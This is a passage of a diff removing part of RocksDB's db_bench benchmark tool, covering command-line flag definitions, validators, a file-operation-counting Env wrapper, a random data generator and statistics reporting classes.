-            "Open a BlobDB instance. "
-            "Required for largevalue benchmark.");
-
-DEFINE_bool(transaction_db, false,
-            "Open a TransactionDB instance. "
-            "Required for randomtransaction benchmark.");
-
-DEFINE_uint64(transaction_sets, 2,
-              "Number of keys each transaction will "
-              "modify (use in RandomTransaction only).  Max: 9999");
-
-DEFINE_bool(transaction_set_snapshot, false,
-            "Setting to true will have each transaction call SetSnapshot()"
-            " upon creation.");
-
-DEFINE_int32(transaction_sleep, 0,
-             "Max microseconds to sleep in between "
-             "reading and writing a value (used in RandomTransaction only). ");
-
-DEFINE_uint64(transaction_lock_timeout, 100,
-              "If using a transaction_db, specifies the lock wait timeout in"
-              " milliseconds before failing a transaction waiting on a lock");
-DEFINE_string(
-    options_file, "",
-    "The path to a RocksDB options file.  If specified, then db_bench will "
-    "run with the RocksDB options in the default column family of the "
-    "specified options file. "
-    "Note that with this setting, db_bench will ONLY accept the following "
-    "RocksDB options related command-line arguments, all other arguments "
-    "that are related to RocksDB options will be ignored:\n"
-    "\t--use_existing_db\n"
-    "\t--statistics\n"
-    "\t--row_cache_size\n"
-    "\t--row_cache_numshardbits\n"
-    "\t--enable_io_prio\n"
-    "\t--dump_malloc_stats\n"
-    "\t--num_multi_db\n");
-
-DEFINE_uint64(fifo_compaction_max_table_files_size_mb, 0,
-              "The limit of total table file sizes to trigger FIFO compaction");
-DEFINE_bool(fifo_compaction_allow_compaction, true,
-            "Allow compaction in FIFO compaction.");
-DEFINE_uint64(fifo_compaction_ttl, 0, "TTL for the SST Files in seconds.");
-#endif  // ROCKSDB_LITE
-
-DEFINE_bool(report_bg_io_stats, false,
-            "Measure times spents on I/Os while in compactions. ");
-
-DEFINE_bool(use_stderr_info_logger, false,
-            "Write info logs to stderr instead of to LOG file. ");
-
-static enum rocksdb::CompressionType StringToCompressionType(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "none"))
-    return rocksdb::kNoCompression;
-  else if (!strcasecmp(ctype, "snappy"))
-    return rocksdb::kSnappyCompression;
-  else if (!strcasecmp(ctype, "zlib"))
-    return rocksdb::kZlibCompression;
-  else if (!strcasecmp(ctype, "bzip2"))
-    return rocksdb::kBZip2Compression;
-  else if (!strcasecmp(ctype, "lz4"))
-    return rocksdb::kLZ4Compression;
-  else if (!strcasecmp(ctype, "lz4hc"))
-    return rocksdb::kLZ4HCCompression;
-  else if (!strcasecmp(ctype, "xpress"))
-    return rocksdb::kXpressCompression;
-  else if (!strcasecmp(ctype, "zstd"))
-    return rocksdb::kZSTD;
-
-  fprintf(stdout, "Cannot parse compression type '%s'\n", ctype);
-  return rocksdb::kSnappyCompression;  // default value
-}
-
-static std::string ColumnFamilyName(size_t i) {
-  if (i == 0) {
-    return rocksdb::kDefaultColumnFamilyName;
-  } else {
-    char name[100];
-    snprintf(name, sizeof(name), "column_family_name_%06zu", i);
-    return std::string(name);
-  }
-}
-
-DEFINE_string(compression_type, "snappy",
-              "Algorithm to use to compress the database");
-static enum rocksdb::CompressionType FLAGS_compression_type_e =
-    rocksdb::kSnappyCompression;
-
-DEFINE_int32(compression_level, -1,
-             "Compression level. For zlib this should be -1 for the "
-             "default level, or between 0 and 9.");
-
-DEFINE_int32(compression_max_dict_bytes, 0,
-             "Maximum size of dictionary used to prime the compression "
-             "library.");
-
-static bool ValidateCompressionLevel(const char* flagname, int32_t value) {
-  if (value < -1 || value > 9) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be between -1 and 9\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-static const bool FLAGS_compression_level_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_compression_level, &ValidateCompressionLevel);
-
-DEFINE_int32(min_level_to_compress, -1, "If non-negative, compression starts"
-             " from this level. Levels with number < min_level_to_compress are"
-             " not compressed. Otherwise, apply compression_type to "
-             "all levels.");
-
-static bool ValidateTableCacheNumshardbits(const char* flagname,
-                                           int32_t value) {
-  if (0 >= value || value > 20) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be  0 < val <= 20\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(table_cache_numshardbits, 4, "");
-
-#ifndef ROCKSDB_LITE
-DEFINE_string(env_uri, "", "URI for registry Env lookup. Mutually exclusive"
-              " with --hdfs.");
-#endif  // ROCKSDB_LITE
-DEFINE_string(hdfs, "", "Name of hdfs environment. Mutually exclusive with"
-              " --env_uri.");
-static rocksdb::Env* FLAGS_env = rocksdb::Env::Default();
-
-DEFINE_int64(stats_interval, 0, "Stats are reported every N operations when "
-             "this is greater than zero. When 0 the interval grows over time.");
-
-DEFINE_int64(stats_interval_seconds, 0, "Report stats every N seconds. This "
-             "overrides stats_interval when both are > 0.");
-
-DEFINE_int32(stats_per_interval, 0, "Reports additional stats per interval when"
-             " this is greater than 0.");
-
-DEFINE_int64(report_interval_seconds, 0,
-             "If greater than zero, it will write simple stats in CVS format "
-             "to --report_file every N seconds");
-
-DEFINE_string(report_file, "report.csv",
-              "Filename where some simple stats are reported to (if "
-              "--report_interval_seconds is bigger than 0)");
-
-DEFINE_int32(thread_status_per_interval, 0,
-             "Takes and report a snapshot of the current status of each thread"
-             " when this is greater than 0.");
-
-DEFINE_int32(perf_level, rocksdb::PerfLevel::kDisable, "Level of perf collection");
-
-static bool ValidateRateLimit(const char* flagname, double value) {
-  const double EPSILON = 1e-10;
-  if ( value < -EPSILON ) {
-    fprintf(stderr, "Invalid value for --%s: %12.6f, must be >= 0.0\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_double(soft_rate_limit, 0.0, "DEPRECATED");
-
-DEFINE_double(hard_rate_limit, 0.0, "DEPRECATED");
-
-DEFINE_uint64(soft_pending_compaction_bytes_limit, 64ull * 1024 * 1024 * 1024,
-              "Slowdown writes if pending compaction bytes exceed this number");
-
-DEFINE_uint64(hard_pending_compaction_bytes_limit, 128ull * 1024 * 1024 * 1024,
-              "Stop writes if pending compaction bytes exceed this number");
-
-DEFINE_uint64(delayed_write_rate, 8388608u,
-              "Limited bytes allowed to DB when soft_rate_limit or "
-              "level0_slowdown_writes_trigger triggers");
-
-DEFINE_bool(enable_pipelined_write, true,
-            "Allow WAL and memtable writes to be pipelined");
-
-DEFINE_bool(allow_concurrent_memtable_write, true,
-            "Allow multi-writers to update mem tables in parallel.");
-
-DEFINE_bool(enable_write_thread_adaptive_yield, true,
-            "Use a yielding spin loop for brief writer thread waits.");
-
-DEFINE_uint64(
-    write_thread_max_yield_usec, 100,
-    "Maximum microseconds for enable_write_thread_adaptive_yield operation.");
-
-DEFINE_uint64(write_thread_slow_yield_usec, 3,
-              "The threshold at which a slow yield is considered a signal that "
-              "other processes or threads want the core.");
-
-DEFINE_int32(rate_limit_delay_max_milliseconds, 1000,
-             "When hard_rate_limit is set then this is the max time a put will"
-             " be stalled.");
-
-DEFINE_uint64(rate_limiter_bytes_per_sec, 0, "Set options.rate_limiter value.");
-
-DEFINE_bool(rate_limit_bg_reads, false,
-            "Use options.rate_limiter on compaction reads");
-
-DEFINE_uint64(
-    benchmark_write_rate_limit, 0,
-    "If non-zero, db_bench will rate-limit the writes going into RocksDB. This "
-    "is the global rate in bytes/second.");
-
-DEFINE_uint64(
-    benchmark_read_rate_limit, 0,
-    "If non-zero, db_bench will rate-limit the reads from RocksDB. This "
-    "is the global rate in ops/second.");
-
-DEFINE_uint64(max_compaction_bytes, rocksdb::Options().max_compaction_bytes,
-              "Max bytes allowed in one compaction");
-
-#ifndef ROCKSDB_LITE
-DEFINE_bool(readonly, false, "Run read only benchmarks.");
-#endif  // ROCKSDB_LITE
-
-DEFINE_bool(disable_auto_compactions, false, "Do not auto trigger compactions");
-
-DEFINE_uint64(wal_ttl_seconds, 0, "Set the TTL for the WAL Files in seconds.");
-DEFINE_uint64(wal_size_limit_MB, 0, "Set the size limit for the WAL Files"
-              " in MB.");
-DEFINE_uint64(max_total_wal_size, 0, "Set total max WAL size");
-
-DEFINE_bool(mmap_read, rocksdb::Options().allow_mmap_reads,
-            "Allow reads to occur via mmap-ing files");
-
-DEFINE_bool(mmap_write, rocksdb::Options().allow_mmap_writes,
-            "Allow writes to occur via mmap-ing files");
-
-DEFINE_bool(use_direct_reads, rocksdb::Options().use_direct_reads,
-            "Use O_DIRECT for reading data");
-
-DEFINE_bool(use_direct_io_for_flush_and_compaction,
-            rocksdb::Options().use_direct_io_for_flush_and_compaction,
-            "Use O_DIRECT for background flush and compaction I/O");
-
-DEFINE_bool(advise_random_on_open, rocksdb::Options().advise_random_on_open,
-            "Advise random access on table file open");
-
-DEFINE_string(compaction_fadvice, "NORMAL",
-              "Access pattern advice when a file is compacted");
-static auto FLAGS_compaction_fadvice_e =
-  rocksdb::Options().access_hint_on_compaction_start;
-
-DEFINE_bool(use_tailing_iterator, false,
-            "Use tailing iterator to access a series of keys instead of get");
-
-DEFINE_bool(use_adaptive_mutex, rocksdb::Options().use_adaptive_mutex,
-            "Use adaptive mutex");
-
-DEFINE_uint64(bytes_per_sync,  rocksdb::Options().bytes_per_sync,
-              "Allows OS to incrementally sync SST files to disk while they are"
-              " being written, in the background. Issue one request for every"
-              " bytes_per_sync written. 0 turns it off.");
-
-DEFINE_uint64(wal_bytes_per_sync,  rocksdb::Options().wal_bytes_per_sync,
-              "Allows OS to incrementally sync WAL files to disk while they are"
-              " being written, in the background. Issue one request for every"
-              " wal_bytes_per_sync written. 0 turns it off.");
-
-DEFINE_bool(use_single_deletes, true,
-            "Use single deletes (used in RandomReplaceKeys only).");
-
-DEFINE_double(stddev, 2000.0,
-              "Standard deviation of normal distribution used for picking keys"
-              " (used in RandomReplaceKeys only).");
-
-DEFINE_int32(key_id_range, 100000,
-             "Range of possible value of key id (used in TimeSeries only).");
-
-DEFINE_string(expire_style, "none",
-              "Style to remove expired time entries. Can be one of the options "
-              "below: none (do not expired data), compaction_filter (use a "
-              "compaction filter to remove expired data), delete (seek IDs and "
-              "remove expired data) (used in TimeSeries only).");
-
-DEFINE_uint64(
-    time_range, 100000,
-    "Range of timestamp that store in the database (used in TimeSeries"
-    " only).");
-
-DEFINE_int32(num_deletion_threads, 1,
-             "Number of threads to do deletion (used in TimeSeries and delete "
-             "expire_style only).");
-
-DEFINE_int32(max_successive_merges, 0, "Maximum number of successive merge"
-             " operations on a key in the memtable");
-
-static bool ValidatePrefixSize(const char* flagname, int32_t value) {
-  if (value < 0 || value>=2000000000) {
-    fprintf(stderr, "Invalid value for --%s: %d. 0<= PrefixSize <=2000000000\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(prefix_size, 0, "control the prefix size for HashSkipList and "
-             "plain table");
-DEFINE_int64(keys_per_prefix, 0, "control average number of keys generated "
-             "per prefix, 0 means no special handling of the prefix, "
-             "i.e. use the prefix comes with the generated random number.");
-DEFINE_int32(memtable_insert_with_hint_prefix_size, 0,
-             "If non-zero, enable "
-             "memtable insert with hint with the given prefix size.");
-DEFINE_bool(enable_io_prio, false, "Lower the background flush/compaction "
-            "threads' IO priority");
-DEFINE_bool(identity_as_first_hash, false, "the first hash function of cuckoo "
-            "table becomes an identity function. This is only valid when key "
-            "is 8 bytes");
-DEFINE_bool(dump_malloc_stats, true, "Dump malloc stats in LOG ");
-
-enum RepFactory {
-  kSkipList,
-  kPrefixHash,
-  kVectorRep,
-  kHashLinkedList,
-  kCuckoo
-};
-
-static enum RepFactory StringToRepFactory(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "skip_list"))
-    return kSkipList;
-  else if (!strcasecmp(ctype, "prefix_hash"))
-    return kPrefixHash;
-  else if (!strcasecmp(ctype, "vector"))
-    return kVectorRep;
-  else if (!strcasecmp(ctype, "hash_linkedlist"))
-    return kHashLinkedList;
-  else if (!strcasecmp(ctype, "cuckoo"))
-    return kCuckoo;
-
-  fprintf(stdout, "Cannot parse memreptable %s\n", ctype);
-  return kSkipList;
-}
-
-static enum RepFactory FLAGS_rep_factory;
-DEFINE_string(memtablerep, "skip_list", "");
-DEFINE_int64(hash_bucket_count, 1024 * 1024, "hash bucket count");
-DEFINE_bool(use_plain_table, false, "if use plain table "
-            "instead of block-based table format");
-DEFINE_bool(use_cuckoo_table, false, "if use cuckoo table format");
-DEFINE_double(cuckoo_hash_ratio, 0.9, "Hash ratio for Cuckoo SST table.");
-DEFINE_bool(use_hash_search, false, "if use kHashSearch "
-            "instead of kBinarySearch. "
-            "This is valid if only we use BlockTable");
-DEFINE_bool(use_block_based_filter, false, "if use kBlockBasedFilter "
-            "instead of kFullFilter for filter block. "
-            "This is valid if only we use BlockTable");
-DEFINE_string(merge_operator, "", "The merge operator to use with the database."
-              "If a new merge operator is specified, be sure to use fresh"
-              " database The possible merge operators are defined in"
-              " utilities/merge_operators.h");
-DEFINE_int32(skip_list_lookahead, 0, "Used with skip_list memtablerep; try "
-             "linear search first for this many steps from the previous "
-             "position");
-DEFINE_bool(report_file_operations, false, "if report number of file "
-            "operations");
-
-static const bool FLAGS_soft_rate_limit_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_soft_rate_limit, &ValidateRateLimit);
-
-static const bool FLAGS_hard_rate_limit_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_hard_rate_limit, &ValidateRateLimit);
-
-static const bool FLAGS_prefix_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefix_size, &ValidatePrefixSize);
-
-static const bool FLAGS_key_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_key_size, &ValidateKeySize);
-
-static const bool FLAGS_cache_numshardbits_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_cache_numshardbits,
-                          &ValidateCacheNumshardbits);
-
-static const bool FLAGS_readwritepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_readwritepercent, &ValidateInt32Percent);
-
-DEFINE_int32(disable_seek_compaction, false,
-             "Not used, left here for backwards compatibility");
-
-static const bool FLAGS_deletepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_deletepercent, &ValidateInt32Percent);
-static const bool FLAGS_table_cache_numshardbits_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_table_cache_numshardbits,
-                          &ValidateTableCacheNumshardbits);
-
-namespace rocksdb {
-
-namespace {
-struct ReportFileOpCounters {
-  std::atomic<int> open_counter_;
-  std::atomic<int> read_counter_;
-  std::atomic<int> append_counter_;
-  std::atomic<uint64_t> bytes_read_;
-  std::atomic<uint64_t> bytes_written_;
-};
-
-// A special Env to records and report file operations in db_bench
-class ReportFileOpEnv : public EnvWrapper {
- public:
-  explicit ReportFileOpEnv(Env* base) : EnvWrapper(base) { reset(); }
-
-  void reset() {
-    counters_.open_counter_ = 0;
-    counters_.read_counter_ = 0;
-    counters_.append_counter_ = 0;
-    counters_.bytes_read_ = 0;
-    counters_.bytes_written_ = 0;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& soptions) override {
-    class CountingFile : public SequentialFile {
-     private:
-      unique_ptr<SequentialFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<SequentialFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-
-      virtual Status Read(size_t n, Slice* result, char* scratch) override {
-        counters_->read_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Read(n, result, scratch);
-        counters_->bytes_read_.fetch_add(result->size(),
-                                         std::memory_order_relaxed);
-        return rv;
-      }
-
-      virtual Status Skip(uint64_t n) override { return target_->Skip(n); }
-    };
-
-    Status s = target()->NewSequentialFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& soptions) override {
-    class CountingFile : public RandomAccessFile {
-     private:
-      unique_ptr<RandomAccessFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<RandomAccessFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-      virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                          char* scratch) const override {
-        counters_->read_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Read(offset, n, result, scratch);
-        counters_->bytes_read_.fetch_add(result->size(),
-                                         std::memory_order_relaxed);
-        return rv;
-      }
-    };
-
-    Status s = target()->NewRandomAccessFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    class CountingFile : public WritableFile {
-     private:
-      unique_ptr<WritableFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<WritableFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-
-      Status Append(const Slice& data) override {
-        counters_->append_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Append(data);
-        counters_->bytes_written_.fetch_add(data.size(),
-                                            std::memory_order_relaxed);
-        return rv;
-      }
-
-      Status Truncate(uint64_t size) override { return target_->Truncate(size); }
-      Status Close() override { return target_->Close(); }
-      Status Flush() override { return target_->Flush(); }
-      Status Sync() override { return target_->Sync(); }
-    };
-
-    Status s = target()->NewWritableFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  // getter
-  ReportFileOpCounters* counters() { return &counters_; }
-
- private:
-  ReportFileOpCounters counters_;
-};
-
-}  // namespace
-
-// Helper for quickly generating random data.
-class RandomGenerator {
- private:
-  std::string data_;
-  unsigned int pos_;
-
- public:
-  RandomGenerator() {
-    // We use a limited amount of data over and over again and ensure
-    // that it is larger than the compression window (32KB), and also
-    // large enough to serve all typical value sizes we want to write.
-    Random rnd(301);
-    std::string piece;
-    while (data_.size() < (unsigned)std::max(1048576, FLAGS_value_size)) {
-      // Add a short fragment that is as compressible as specified
-      // by FLAGS_compression_ratio.
-      test::CompressibleString(&rnd, FLAGS_compression_ratio, 100, &piece);
-      data_.append(piece);
-    }
-    pos_ = 0;
-  }
-
-  Slice Generate(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-
-  Slice GenerateWithTTL(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-};
-
-static void AppendWithSpace(std::string* str, Slice msg) {
-  if (msg.empty()) return;
-  if (!str->empty()) {
-    str->push_back(' ');
-  }
-  str->append(msg.data(), msg.size());
-}
-
-struct DBWithColumnFamilies {
-  std::vector<ColumnFamilyHandle*> cfh;
-  DB* db;
-#ifndef ROCKSDB_LITE
-  OptimisticTransactionDB* opt_txn_db;
-#endif  // ROCKSDB_LITE
-  std::atomic<size_t> num_created;  // Need to be updated after all the
-                                    // new entries in cfh are set.
-  size_t num_hot;  // Number of column families to be queried at each moment.
-                   // After each CreateNewCf(), another num_hot number of new
-                   // Column families will be created and used to be queried.
-  port::Mutex create_cf_mutex;  // Only one thread can execute CreateNewCf()
-  std::vector<int> cfh_idx_to_prob;  // ith index holds probability of operating
-                                     // on cfh[i].
-
-  DBWithColumnFamilies()
-      : db(nullptr)
-#ifndef ROCKSDB_LITE
-        , opt_txn_db(nullptr)
-#endif  // ROCKSDB_LITE
-  {
-    cfh.clear();
-    num_created = 0;
-    num_hot = 0;
-  }
-
-  DBWithColumnFamilies(const DBWithColumnFamilies& other)
-      : cfh(other.cfh),
-        db(other.db),
-#ifndef ROCKSDB_LITE
-        opt_txn_db(other.opt_txn_db),
-#endif  // ROCKSDB_LITE
-        num_created(other.num_created.load()),
-        num_hot(other.num_hot),
-        cfh_idx_to_prob(other.cfh_idx_to_prob) {
-  }
-
-  void DeleteDBs() {
-    std::for_each(cfh.begin(), cfh.end(),
-                  [](ColumnFamilyHandle* cfhi) { delete cfhi; });
-    cfh.clear();
-#ifndef ROCKSDB_LITE
-    if (opt_txn_db) {
-      delete opt_txn_db;
-      opt_txn_db = nullptr;
-    } else {
-      delete db;
-      db = nullptr;
-    }
-#else
-    delete db;
-    db = nullptr;
-#endif  // ROCKSDB_LITE
-  }
-
-  ColumnFamilyHandle* GetCfh(int64_t rand_num) {
-    assert(num_hot > 0);
-    size_t rand_offset = 0;
-    if (!cfh_idx_to_prob.empty()) {
-      assert(cfh_idx_to_prob.size() == num_hot);
-      int sum = 0;
-      while (sum + cfh_idx_to_prob[rand_offset] < rand_num % 100) {
-        sum += cfh_idx_to_prob[rand_offset];
-        ++rand_offset;
-      }
-      assert(rand_offset < cfh_idx_to_prob.size());
-    } else {
-      rand_offset = rand_num % num_hot;
-    }
-    return cfh[num_created.load(std::memory_order_acquire) - num_hot +
-               rand_offset];
-  }
-
-  // stage: assume CF from 0 to stage * num_hot has be created. Need to create
-  //        stage * num_hot + 1 to stage * (num_hot + 1).
-  void CreateNewCf(ColumnFamilyOptions options, int64_t stage) {
-    MutexLock l(&create_cf_mutex);
-    if ((stage + 1) * num_hot <= num_created) {
-      // Already created.
-      return;
-    }
-    auto new_num_created = num_created + num_hot;
-    assert(new_num_created <= cfh.size());
-    for (size_t i = num_created; i < new_num_created; i++) {
-      Status s =
-          db->CreateColumnFamily(options, ColumnFamilyName(i), &(cfh[i]));
-      if (!s.ok()) {
-        fprintf(stderr, "create column family error: %s\n",
-                s.ToString().c_str());
-        abort();
-      }
-    }
-    num_created.store(new_num_created, std::memory_order_release);
-  }
-};
-
-// a class that reports stats to CSV file
-class ReporterAgent {
- public:
-  ReporterAgent(Env* env, const std::string& fname,
-                uint64_t report_interval_secs)
-      : env_(env),
-        total_ops_done_(0),
-        last_report_(0),
-        report_interval_secs_(report_interval_secs),
-        stop_(false) {
-    auto s = env_->NewWritableFile(fname, &report_file_, EnvOptions());
-    if (s.ok()) {
-      s = report_file_->Append(Header() + "\n");
-    }
-    if (s.ok()) {
-      s = report_file_->Flush();
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "Can't open %s: %s\n", fname.c_str(),
-              s.ToString().c_str());
-      abort();
-    }
-
-    reporting_thread_ = port::Thread([&]() { SleepAndReport(); });
-  }
-
-  ~ReporterAgent() {
-    {
-      std::unique_lock<std::mutex> lk(mutex_);
-      stop_ = true;
-      stop_cv_.notify_all();
-    }
-    reporting_thread_.join();
-  }
-
-  // thread safe
-  void ReportFinishedOps(int64_t num_ops) {
-    total_ops_done_.fetch_add(num_ops);
-  }
-
- private:
-  std::string Header() const { return "secs_elapsed,interval_qps"; }
-  void SleepAndReport() {
-    uint64_t kMicrosInSecond = 1000 * 1000;
-    auto time_started = env_->NowMicros();
-    while (true) {
-      {
-        std::unique_lock<std::mutex> lk(mutex_);
-        if (stop_ ||
-            stop_cv_.wait_for(lk, std::chrono::seconds(report_interval_secs_),
-                              [&]() { return stop_; })) {
-          // stopping
-          break;
-        }
-        // else -> timeout, which means time for a report!
-      }
-      auto total_ops_done_snapshot = total_ops_done_.load();
-      // round the seconds elapsed
-      auto secs_elapsed =
-          (env_->NowMicros() - time_started + kMicrosInSecond / 2) /
-          kMicrosInSecond;
-      std::string report = ToString(secs_elapsed) + "," +
-                           ToString(total_ops_done_snapshot - last_report_) +
-                           "\n";
-      auto s = report_file_->Append(report);
-      if (s.ok()) {
-        s = report_file_->Flush();
-      }
-      if (!s.ok()) {
-        fprintf(stderr,
-                "Can't write to report file (%s), stopping the reporting\n",
-                s.ToString().c_str());
-        break;
-      }
-      last_report_ = total_ops_done_snapshot;
-    }
-  }
-
-  Env* env_;
-  std::unique_ptr<WritableFile> report_file_;
-  std::atomic<int64_t> total_ops_done_;
-  int64_t last_report_;
-  const uint64_t report_interval_secs_;
-  rocksdb::port::Thread reporting_thread_;
-  std::mutex mutex_;
-  // will notify on stop
-  std::condition_variable stop_cv_;
-  bool stop_;
-};
-
-enum OperationType : unsigned char {
-  kRead = 0,
-  kWrite,
-  kDelete,
-  kSeek,
-  kMerge,
-  kUpdate,
-  kCompress,
-  kUncompress,
-  kCrc,
-  kHash,
-  kOthers
-};
-
-static std::unordered_map<OperationType, std::string, std::hash<unsigned char>>
-                          OperationTypeString = {
-  {kRead, "read"},
-  {kWrite, "write"},
-  {kDelete, "delete"},
-  {kSeek, "seek"},
-  {kMerge, "merge"},
-  {kUpdate, "update"},
-  {kCompress, "compress"},
-  {kCompress, "uncompress"},
-  {kCrc, "crc"},
-  {kHash, "hash"},
-  {kOthers, "op"}
-};
-
-class CombinedStats;
-class Stats {
- private:
-  int id_;
-  uint64_t start_;
-  uint64_t finish_;
-  double seconds_;
-  uint64_t done_;
-  uint64_t last_report_done_;
-  uint64_t next_report_;
-  uint64_t bytes_;
-  uint64_t last_op_finish_;
-  uint64_t last_report_finish_;
-  std::unordered_map<OperationType, std::shared_ptr<HistogramImpl>,
-                     std::hash<unsigned char>> hist_;
-  std::string message_;
-  bool exclude_from_merge_;
-  ReporterAgent* reporter_agent_;  // does not own
-  friend class CombinedStats;
-
- public:
-  Stats() { Start(-1); }
-
-  void SetReporterAgent(ReporterAgent* reporter_agent) {
-    reporter_agent_ = reporter_agent;
-  }
-
-  void Start(int id) {
-    id_ = id;
-    next_report_ = FLAGS_stats_interval ? FLAGS_stats_interval : 100;
-    last_op_finish_ = start_;
-    hist_.clear();
-    done_ = 0;
-    last_report_done_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    start_ = FLAGS_env->NowMicros();
-    finish_ = start_;
-    last_report_finish_ = start_;
-    message_.clear();
-    // When set, stats from this thread won't be merged with others.
-    exclude_from_merge_ = false;
-  }
-
-  void Merge(const Stats& other) {
-    if (other.exclude_from_merge_)
-      return;
-
-    for (auto it = other.hist_.begin(); it != other.hist_.end(); ++it) {
-      auto this_it = hist_.find(it->first);
-      if (this_it != hist_.end()) {
-        this_it->second->Merge(*(other.hist_.at(it->first)));
-      } else {
-        hist_.insert({ it->first, it->second });
-      }
-    }
-
-    done_ += other.done_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-
-    // Just keep the messages from one thread
-    if (message_.empty()) message_ = other.message_;
-  }
-
-  void Stop() {
-    finish_ = FLAGS_env->NowMicros();
-    seconds_ = (finish_ - start_) * 1e-6;
-  }
-
-  void AddMessage(Slice msg) {
-    AppendWithSpace(&message_, msg);
-  }
-
-  void SetId(int id) { id_ = id; }
-  void SetExcludeFromMerge() { exclude_from_merge_ = true; }
-
-  void PrintThreadStatus() {
-    std::vector<ThreadStatus> thread_list;
-    FLAGS_env->GetThreadList(&thread_list);
-
-    fprintf(stderr, "\n%18s %10s %12s %20s %13s %45s %12s %s\n",
-        "ThreadID", "ThreadType", "cfName", "Operation",
-        "ElapsedTime", "Stage", "State", "OperationProperties");
-
-    int64_t current_time = 0;
-    Env::Default()->GetCurrentTime(&current_time);
-    for (auto ts : thread_list) {
-      fprintf(stderr, "%18" PRIu64 " %10s %12s %20s %13s %45s %12s",
-          ts.thread_id,
-          ThreadStatus::GetThreadTypeName(ts.thread_type).c_str(),
-          ts.cf_name.c_str(),
-          ThreadStatus::GetOperationName(ts.operation_type).c_str(),
-          ThreadStatus::MicrosToString(ts.op_elapsed_micros).c_str(),
-          ThreadStatus::GetOperationStageName(ts.operation_stage).c_str(),
-          ThreadStatus::GetStateName(ts.state_type).c_str());
-
-      auto op_properties = ThreadStatus::InterpretOperationProperties(
-          ts.operation_type, ts.op_properties);
-      for (const auto& op_prop : op_properties) {
-        fprintf(stderr, " %s %" PRIu64" |",
-            op_prop.first.c_str(), op_prop.second);
-      }
-      fprintf(stderr, "\n");
-    }
-  }
-
-  void ResetLastOpTime() {
-    // Set to now to avoid latency from calls to SleepForMicroseconds
-    last_op_finish_ = FLAGS_env->NowMicros();
-  }
-
-  void FinishedOps(DBWithColumnFamilies* db_with_cfh, DB* db, int64_t num_ops,
-                   enum OperationType op_type = kOthers) {
-    if (reporter_agent_) {
-      reporter_agent_->ReportFinishedOps(num_ops);
-    }
-    if (FLAGS_histogram) {
-      uint64_t now = FLAGS_env->NowMicros();
-      uint64_t micros = now - last_op_finish_;
-
-      if (hist_.find(op_type) == hist_.end())
-      {
-        auto hist_temp = std::make_shared<HistogramImpl>();
-        hist_.insert({op_type, std::move(hist_temp)});
-      }
-      hist_[op_type]->Add(micros);
-
-      if (micros > 20000 && !FLAGS_stats_interval) {
-        fprintf(stderr, "long op: %" PRIu64 " micros%30s\r", micros, "");
-        fflush(stderr);
-      }
-      last_op_finish_ = now;
-    }
-
-    done_ += num_ops;
-    if (done_ >= next_report_) {
-      if (!FLAGS_stats_interval) {
-        if      (next_report_ < 1000)   next_report_ += 100;
-        else if (next_report_ < 5000)   next_report_ += 500;
-        else if (next_report_ < 10000)  next_report_ += 1000;
-        else if (next_report_ < 50000)  next_report_ += 5000;
-        else if (next_report_ < 100000) next_report_ += 10000;
-        else if (next_report_ < 500000) next_report_ += 50000;
-        else                            next_report_ += 100000;
